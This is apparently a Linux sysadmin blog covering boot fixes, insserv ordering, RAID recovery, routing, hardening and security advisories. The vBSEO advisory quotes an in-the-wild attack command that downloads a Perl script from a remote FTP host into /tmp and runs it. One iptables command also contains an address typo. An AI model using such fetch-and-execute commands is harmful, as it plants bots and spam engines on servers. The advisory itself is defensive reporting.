CentOS6 initrd says “already mounted or /sysroot busy”

If you are booting a CentOS 6 system after having migrated its root filesystem to a new volume, you might get the following errors if /proc or /sys is missing:

EXT4-fs (dm-0): mounted filesystem with ordered data mode. Opts: 
mount: /dev/mapper/vg0-root already mounted or /sysroot busy
mount: according to mtab, /dev/mapper/vg0-root is already mounted on /sysroot
dracut: Remounting /dev/mapper/vg0-root with -o relatime,ro
EXT4-fs (dm-0): mounted filesystem with ordered data mode. Opts: 
mount: /dev/mapper/vg0-root already mounted or /sysroot busy
mount: according to mtab, /dev/mapper/vg0-root is already mounted on /sysroot
dracut: Remounting /dev/mapper/vg0-root with -o relatime,ro
EXT4-fs (dm-0): mounted filesystem with ordered data mode. Opts: 
dracut Warning: Can't mount root filesystem

To fix this, all you need to do is mount the root filesystem and “mkdir proc/ sys/”. You can even do this from inside of dracut if you add the “rdshell” argument to the end of your kernel command line:

dracut:/# mount -o remount,rw /sysroot
dracut:/# mkdir /sysroot/proc /sysroot/sys
dracut:/# mount -o remount,ro /sysroot
dracut:/# exit
(You may need to reboot the server)

-Eric

 

 

Forcing insserv to start sshd early

Many distributions are using the `insserv` based dependency following at boot time.  After a bit of searching, I found very little actual documentation on the subject.  Here’s the process:

  1. Add override files to /etc/insserv/override/
  2. The files must contain ‘### BEGIN INIT INFO’ and ‘### END INIT INFO’, else insserv will ignore them.
  3. Some have indicated that you can override missing LSB fields with this method, however, it does require the Default-Start and Default-Start options even though you wouldn’t expect to need to override those.
  4. The name of the file in /etc/insserv/override must be equal to the name in /etc/init.d *not* the name it “Provides:”.  In an ideal world, the name would be the same as provides—but in this case that isn’t always so.

For my purpose, I created overrides for all of my services in rc2.d with this script.  Note that the overrides are just copies of the content  from the /etc/init.d/ scripts:

cd /etc/rc2.d
# This is one long line; $f is filename, $p is the Provides value.
grep Provides * | cut -f1,3 -d: | tr -d : | while read f p; do perl -lne '$a++ if /BEGIN INIT INFO/; print if $a; $a-- if /END INIT INFO/' $f > /etc/insserv/overrides/$p;done

Note that the script writes the filename from the “Provides” field so you may need to change the filename if you have initscripts where /etc/init.d/script doesn’t match the Provides field.  Notably, Debian Wheezy does not follow this for ssh.  Provides is sshd, but the script is named ssh.

Next, I append sshd to the Require-Start line of all of my overrides:

cd /etc/insserv/overrides/
perl -i -lne 's/(Required-Start.*)$/$1 sshd/; print' *

This of course creates a cyclic dependency for ssh, so fix that one up by hand.  Feel free to make any other boot-order preferences while you’re in the overrides directory.  For this case, ssh  was made dependent on netplug.

Finally, run `insserv` and double-check that it did what you expected:

# cat /etc/init.d/.depend.start
TARGETS = rsyslog munin-node killprocs motd sysfsutils sudo netplug rsync ssh mysql openvpn ntp wd_keepalive apache2 bootlogs cron stop-readahead-fedora watchdog single rc.local rmnologin
INTERACTIVE =
netplug: rsyslog
rsync: rsyslog
ssh: rsyslog netplug
mysql: rsyslog ssh
ntp: rsyslog ssh
[...snip...]

Viola!  Now I can ssh to the host far earlier, and before services that can take a long time to start to troubleshoot in case of a problem.  In my opinion, ssh should always run directly after the network starts.

-Eric

 

Linux Kernel bug from 2002?

Really Old Bugs

Apparently there is a bug from kernels as old as 2.5.44 that pop up every so often causing hours of work for developers to hunt down.  Hopefully it can be fixed upstream, or maybe this is a “won’t fix” for some very good reason that I am unaware of:  http://osdir.com/ml/linux.enbd.general/2002-10/msg00176.html .  In my opinion, an issue like this should give some meaningful error rather than causing deadlock.

 

The fix

Basically add_disk (and therefore register_disk() where the problem actually resides) must be called *before* set_capacity() in Linux block device drivers.  This is backwards of the way I would think, as I would configure the device parameters before publishing it into userspace—but that is backwards in the Linux kernel and can (will?) cause deadlock.

Upstream

Recently I encountered this issue/bug in a zfs-git (zfsonlinux) build.  I’ve resolved the kernel hang and I’m working on a minimal patch for ZFS.  For now follow this ZFS ZVOL issue on github: https://github.com/zfsonlinux/zfs/issues/1488 .

Update: a pull request is pending here: https://github.com/zfsonlinux/zfs/pull/1491 and a patch has been listed on the issues page.

 

-Eric

CVE-2013-2094: Linux Root Privilege Escalation Attack

On May 14th an attack in the wild began circling which enables non-root users to become root for kernels 2.6.37–3.8.8 (inclusive) compiled with PERF_EVENTS, in addition to cirtain earlier kernels containing the bug as a backport. This only affects 64-bit operating systems.  This is the best technical writeup I have seen on the subject: CVE-2013-2094 Perf Events Exploit Explained

Ubuntu 10.04 is not affected.
RHEL 5 are not affected.
Debian Squeeze is not affected.

Known Vulnerable Distributions and Kernel Versions

NOTE: You are extra-vulnerable if you have untrusted non-root users on your server!

CentOS/RHEL kernels earlier than 2.6.32-358.6.2
If you can’t reboot, try this fix: https://access.redhat.com/site/solutions/373743

Ubuntu 12.04 3.2 kernels earlier than 3.2.0-43.68
Ubuntu 12.04 3.5 kernels earlier than 3.5.0-30.51~precise1
Ubuntu 12.10 3.5 kernels earlier than 3.5.0-30.51
Ubuntu 13.04 3.8 kernels earlier than 3.8.0-21.32

Debian Wheezy 3.2 kernels earlier than 3.2.41-2+deb7u2
Debian Jessie 3.2 kernels earlier than 3.2.41-2+deb7u2
Debian unstable 3.8 kernels earlier than 3.8.11-1

There may be other back-ported kernels which have this vulnerability, so if in doubt, update your kernel!

Linux is Easy!

My colleague Dave Kaplan just published an eBook entitled Linux is Easy! available for preview and purchase.  Dave’s Linux interests are focused around Desktop installations and promoting Linux whenever appropriate.  Dave and I share work back-and-forth and we complement eachother well; his focus is Linux-desktop whereas my service and experience is Linux-server based.

So if you landed here wondering what the Linux buzz is all about and you’d like to give Linux a spin on your desktop or laptop— just check out the eBook, download Linux Mint, and give it a spin!

-Eric

Tightening CentOS/RHEL Security

While there is far more to hardening a server than this single example, this is an often overlooked security issue in many default installations of RHEL and RHEL-based distributions (CentOS, Scientific Linux, etc.)

CentOS and RHEL come with the isdn4k-utils and coolkey packages installed by default for graphical workstations.  Unfortunately, these packages create world-writable directories which binaries and scripts may execute from.  While it is common to tighten /tmp, /var/tmp and /usr/tmp against execution attacks, these directories often go un-noticed.

If you do not use these utilities (and few servers do), they can be easily removed:

yum remove isdn4k-utils coolkey

Of course if you are using these, then you should find a way to secure these mountpoints with the noexec mount option.  This can be done with a loopback filesystem mounted atop the offending mountpoints or with separate LVM volumes for each.

Traditionally, /var does not run executable code so you could mount the entire /var mountpoint as noexec.  Its a great security practice if you can support this, however, there are some packages which expect to run their update scripts out of /var/tmp/ so be prepared to fix some broken package updates or installations.  When you do have a package error, simply mount /var as executable:

mount -o remount,rw,exec /var

install the package, and then disable execution on the mountpoint:

mount -o remount,rw,noexec /var

I recommend nosuid and nodev mount options for these types of mount points as well to restrict less common attack vectors.

-Eric

Linux PCI Compliance: Passing the Scan

PCI Compliance Introduction

PCI compliance is required by the credit card card processing industry.  If you are a merchant provider, no doubt you have been contacted by a PCI compliance scanning vendor of some form, generally sponsored by your bank or merchant provider.

Passing a PCI compliance scan is not too difficult, though there are a few technical hurdles to pass.

 

Server and Network Scanning

Generally speaking, you are required to answer an (excessively) long series of security questions, many of which may have no relation to your business.  Further, they obtain your server IP addresses and scan your systems for security vulnerabilities.

The report format varies, but generally you receive a brief technical description for each item, usually linked to the CVE “Common Vulnerabilities and Exposures” database.  If you are technically inclined or have technical staff who understand what should be changed to pass the scan, then you can generally resolve this internally.

If not, then unfortunately the scanning vendors do not offer support when a compliance scan fails and you are left to your own devices.

 

Passing the PCI Compliance Scan for Linux

Keep in mind that the purpose of passing a scan isn’t just to pass: passing the scan means your server meets a minimum baseline security level for operation on the public Internet.  Not only will your merchant provider be tickled by your compliance, but your server will be more secure for the effort.

There are a series of general security practices that you can follow which will help you pass your scan and increase server security at the same time:

  • Run only the services which are absolutely necessary for your server’s operation
  • Install distribution package and security updates
  • Configure a firewall to minimize the scan surface available to the scanner or to an attacker
  • Use SSL certificates signed by a reputable certificate authority
  • Make sure intermediate SSL certificates are installed
  • Configure your SSL framework to force strong cryptographic ciphers
  • Be certain that the domain being scanned matches the common name on the certificates.  For example: if your SSL certificate is www.example.net but your website is www.example.com, then you will probably fail the PCI scan.
  • Use your web server’s document root for a single purpose.  For example, develop your new shiny website on a different or internal domain, not in the “/dev” or “/new” directory on your production site.
  • Make sure your web application is up to date—especially if your site is based on an old version of an open-source content management system such as WordPress or Joomla.
  • Dedicate one server per application function.  For example, have mail on a dedicated mail server, web on a dedicated web server.  Running both services on the same machine increases your security exposure and makes it more difficult to pass your PCI scan.

If you have followed these practices and are still having trouble passing your scan—or just want to increase your server’s security—then give me a call.  I’m always happy to help!

-Eric

 

 

vBulletin and vBSEO Exploit: Attacks in the Wild

We are seeing the use of this exploit in the wild:

BSEO <= 3.6.0 “proc_deutf()” Remote PHP Code Injection

Its been patched for over a year, but someone has automated scanning for vbseocp.php and hosts are getting compromised.

The fix is to update vBSEO to the latest version, and the source of the attack lives here: ./vbseo/includes/functions_vbseocp_abstract.php with improper escaping of the char_repl POST parameter.  This is vulnerable whether or not you have register_globals enabled.

The attack we are seeing takes the form of:

cd /tmp;wget ftp://user:pass@host/x.pl;curl -O ftp://user:pass@host/x.pl;perl x.pl;rm -rf x.pl

We have seen two distinct payloads: an IRC c&c bot and a spam engine executing from /tmp/.  The IRC bot sets its name as /usr/local/sbin/httpd to appear benign and makes outbound IRC connections.

If you think you may be infected, contact us as soon as possible so we can get this removed and locked down.  Our standard countermeasures would have prevented this attack even on unpatched hosts.

-Eric

Linux Software RAID, disk-0 failed. Will my server still boot?

First, it is my opinion that you shouldst use hardware RAID of some form.  Software RAID, in my opinion, is best used to stripe volumes between multiple hardware RAID controllers which do not support spanning.

My opinion aside, will the server still boot?  Yes!  … if it is configured correctly.

The Multiple Disk (md) infrastructure in Linux is quite flexible, and there are many articles available for its use.  When configuring a server to recover from a failed disk-0 in a RAID mirror, your boot partition should be mirrored using metadata version 1.0.  Version 1.0 places metadata at the end of the device, whereas 1.1 metadata is at the front of the device.  Since metadata is at the end of the disk, GRUB (or whatever bootloader you prefer) can still read your boot images.

Lets say you have a server with (at least) three disk bays.  Disk-0 in bay1 fails,  so you add a 3rd disk in bay3 and rebuild the volume.  The process might look something like thos:

## Transfer the boot sector
# dd if=/dev/sdb count=1 of=/dev/sdc 

## Reread the partition table
# blockdev --rereadpt /dev/sdc

## Add the hot spare
# mdadm --add /dev/md0 /dev/sdc1
# mdadm --add /dev/md1 /dev/sdc2

## Fail the bad disk:
# mdadm --fail /dev/sda1
# mdadm --fail /dev/sda2

Now disk-0 (sda) is failed, and the mirror is rebuilding on sdb/sdc.  If you boot, what will happen?  Will it load the mirror correctly?  Will the kernel respect which disk is in the mirror?  We recently had a real-life scenario where a CentOS 6 server was in production and could not be rebooted, but we needed to know if the server would come up if there was a reboot.  Disk-0 was dying (but not completely dead yet).

Test to make certain

  1. If disk1 may not contain the right boot sector, so when disk0 is removed, will the server boot?
  2. If disk0 isn’t removed and the server is rebooted, will it boot?  If it does come up, will the kernel respect that disk0 is, indeed, failed?

The answer to both of these questions, at least in theory, is yes.

To be sure, I simulated the two failure scenarios above and everything worked without intervention.  This was the order of things, disks are named disk0, disk1, disk2:

  1. Install CentOS 6 on mirrored boot and lvm partitions across two disks.
  2. Add disk2, copy the bootsector over, and add as a hot spare.
  3. Fail disk0, let the hot spare rebuild.
  4. reboot!
  5. The system loads the bootsector from disk0 because it is the first physical disk serviced by BIOS.
  6. The kernel boots and auto-detects the RAID1 mirrors on disk1 and disk2, ignoring disk0 which we failed (good!)  This verifies question #1.
  7. Physically remove disk0; BIOS will see disk1 as the first BIOS drive.
  8. reboot.
  9. The system loads the bootsector from disk1 because it is the first physical disk serviced by BIOS.
  10. The kernel boots and initrd auto-configures the RAID1 mirrors on disk1 and disk2.  Thus validates question #2.

Of course you would expect the above to work—but its always best to test and understand exactly how your disk-volume software will act in various failure scenarios when working in a production environment.  “I think so” isn’t good enough to go on—you must know.

So, if you’re booting from software RAID, you can usually trust that your data is safe.   Sometimes a failed disk will hang IOs to the device.  I have seen servers completely freeze when this happens while it attempts to retry the IO over-and-over-and-over.  This is where hardware RAID can really save you; the hardware controller would have timed-out the RAID member disk, failed it, and continued with very little (if any) interruption.

Linux Raid controller tips

  • Be careful of “softraid” chipsets out there, not all RAID is real-RAID.  My favorite controllers in order or preference are 3ware, Areca, and LSI.  The PERC 7xx series are ok too, but I wouldn’t trust a PERC 2xx.
  • If you use LSI go with a higher-end controller for better performance and less fuss.  Generally speaking, I’ve had great success with LSI controllers that have onboard cache memory (even if you don’t use it in write-back mode).  Cacheless LSI controllers have created problems more times than I care to recall.
  • Check the RAID-levels that the card supports.  If the controller supports RAID-5 or -6, it is probably a better controller even if you only use the RAID-10 functionality.
  • Also of note, LSI now owns 3ware and uses LSI chips in 3ware’s hardware.  I have since used LSI-built 3ware cards and they still have the simple and robust 3ware feel.  I have a feeling that LSI will keep the 3ware brand for some time to come.

-Eric

 

Bypassing the link-local routing table

Linux can use multiple routing tables, which is convenient for providing different routes for specific networks based on many different metrics, such as the source address.  For example, if we want to route traffic from 192.168.99.0/24 out the 172.17.22.1 default gateway, you could create a new table and route it as such:

# ip route add default via 172.17.22.1 dev eth7 table 100
# ip rule add from 192.168.99.0/24 lookup 100

Now imagine another scenario, where you wish to route traffic from 192.168.99.0/24 to an external network (the Internet), but 1.2.3.0/24 is (for some reason) link-local on your host.  That is, an address like 1.2.3.4 is directly assigned to an adapter on your host.  Linux tracks link-local connections through its ‘local’ routing table, and the ip rule’s show the preference order as:

# ip rule show
0:    from all lookup local 
32766:    from all lookup main 
32767:    from all lookup default

You might think deleting and adding the ‘local’ rule above with a higher preference and placing your new rule above it would fix the problem, but I’ve tried it—and it doesn’t.  Searching around shows that others have had the same problem.

So what to do?  Use fwmark.

First, change local’s preference from 0 to 100:

ip rule del from all pref 0 lookup local
ip rule add from all pref 100 lookup local

Next, mark all traffic from 192.168.99.0/24 with some mark, we are using “1”.  Note that I am using OUTPUT because 192.168.99.0/24 is my local address.  You might want PREROUTING if this is a forwarding host.

iptables -t mangle -s 192.68.99.0/24 -A OUTPUT -j MARK --set-mark 1

And finally add the rule that routes it through table 100:

# ip rule add fwmark 1 pref 10 lookup 100
# ip rule show
10:    from all fwmark 0x1 lookup 100
100:    from all lookup local
32766:    from all lookup main
32767:    from all lookup default

# ip route flush cache

Now all locally generated traffic to 1.2.3.0/24 from 192.168.99.0/24 will head out 172.17.22.1 on eth7 through table 100, instead of being looked up in the ‘local’ table.

Yay!

-Eric